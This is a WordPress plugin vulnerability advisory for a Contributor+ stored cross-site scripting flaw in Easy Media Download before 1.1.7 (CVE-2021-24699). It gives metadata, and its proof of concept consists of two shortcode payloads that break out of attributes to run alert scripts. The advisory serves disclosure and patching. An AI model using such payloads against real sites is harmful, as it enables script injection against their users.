WordPress Plugin Vulnerabilities

Easy Media Download < 1.1.7 - Contributor+ Stored Cross-Site Scripting

Description

The plugin does not escape the text argument of its shortcode, which could allow users with a role as low as Contributor to perform Stored Cross-Site Scripting attacks.

Proof of Concept

Affected argument: url, text, target, rel and class

[easy_media_download url="/" text='" onerror="alert(/XSS/)//http']
[easy_media_download url="/" text="a" target='"autofocus onfocus=alert(/XSS/)//']

Affects Plugins

Plugin icon
easy-media-download
Fixed in 1.1.7

References

CVE
CVE-2021-24699

Classification

Type
XSS
OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79
CVSS
6.8 (medium)

Miscellaneous

Original Researcher
apple502j
Submitter
apple502j
Verified
Yes
WPVDB ID
4f5c3f75-0501-4a1a-95ea-cbfd3fc96852

Timeline

Publicly Published
2021-09-22 (about 2 years ago)
Added
2021-09-22 (about 2 years ago)
Last Updated
2023-02-03 (about 1 years ago)

Other

Published
Title
Published
2023-06-26
Title
Beautiful Cookie Consent Banner < 2.10.2 - Unauthenticated Stored Cross-Site Scripting
Published
2023-09-25
Title
Order Delivery Date for WooCommerce < 3.20.1 - Reflected XSS
Published
2022-02-21
Title
WP Home Page Menu < 3.1 - Admin+ Stored Cross-Site Scripting
Published
2024-04-05
Title
Easy Login Styler – White Label Admin Login Page for WordPress <= 1.0.6 - Authenticated (Administrator+) Stored Cross-Site Scripting
Published
2024-04-29
Title
Sliding Widgets <= 1.5.0 - Authenticated (Subscriber+) Stored Cross-Site Scripting